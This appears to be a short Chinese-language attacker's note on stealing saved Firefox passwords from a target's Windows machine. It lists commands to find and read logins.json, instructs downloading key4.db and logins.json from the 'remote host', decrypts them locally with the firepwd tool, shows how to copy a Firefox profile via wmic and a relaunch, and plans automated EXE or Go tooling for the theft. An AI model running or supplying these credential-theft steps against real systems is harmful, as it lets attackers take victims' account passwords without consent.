Firefox 密码脱取
正常获取
访问 about:logins
配置文件获取
信息:
- Website address
- Username
- Password
- Created
- Last modified
- Last used
保存位置
%APPDATA%MozillaFirefoxProfilesxxxxxxxx.default #xxxxxxxx 为随机字母和数字的组合
logins.json文件
dir %APPDATA%MozillaFirefoxProfiles*logins.json /s /b
查看内容
type C:UsersxAppDataRoamingMozillaFirefoxProfilesxx.default-releaselogins.json
可以查看到,所记录的URL,用户名,加密后的密码。创建时间等信息。
工具:firepwd
https://github.com/lclevy/firepwd
python3 -m pip install -r requirements.txt ##安装 PyCryptodome>=3.9.0 pyasn1>=0.4.8
下载远程主机的 C:UsersxAppDataRoamingMozillaFirefoxProfilesxx.default-release 目录下的
- key4.db
- logins.json
本地执行
python firepwd.py -d new_db
获取到账号密码。
Firefox 配置文件导出
wmic process where name='firefox.exe' get executablepath,processid ##查看火狐浏览器位置
firefox.exe -profile C:Windows empdata1 #启动firefox 并导出
会将Firefox 配置文件导入到指定目录。
未踩的坑
Master Password # 用户手工加了个面膜 (暂时没有遇到目标自己去做这件事,就先不研究了)
如有遇到,解密,用上面的脚本 加-p 参数 输入Master Password的密码 即可,
Todo
1.如果可以在对方机器执行EXE,自己打包python脚本 进行自动化获取
2.或者用go自己写一个..